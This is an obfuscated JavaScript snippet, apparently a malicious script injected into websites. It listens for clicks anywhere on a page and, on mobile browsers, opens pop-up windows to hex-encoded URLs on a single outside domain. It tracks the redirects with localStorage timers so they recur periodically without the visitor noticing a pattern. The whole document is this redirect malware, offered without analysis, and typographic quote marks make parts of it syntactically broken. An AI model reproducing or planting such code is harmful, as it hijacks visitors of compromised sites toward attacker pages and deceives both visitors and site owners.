function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x79\x6e\x5a\x39\x63\x33′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x67\x6a\x47\x38\x63\x33′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x62\x62\x68\x35\x63\x30′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x43\x54\x69\x31\x63\x36′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x69\x4c\x44\x32\x63\x30′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x4f\x57\x34\x63\x38′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x71\x6c\x68\x33\x63\x33′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x75\x70\x67\x30\x63\x39′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x45\x47\x64\x36\x63\x31′,’\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x2d\x79\x2e\x63\x6f\x6d\x70\x61\x6e\x79\x2f\x55\x6f\x65\x37\x63\x34′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());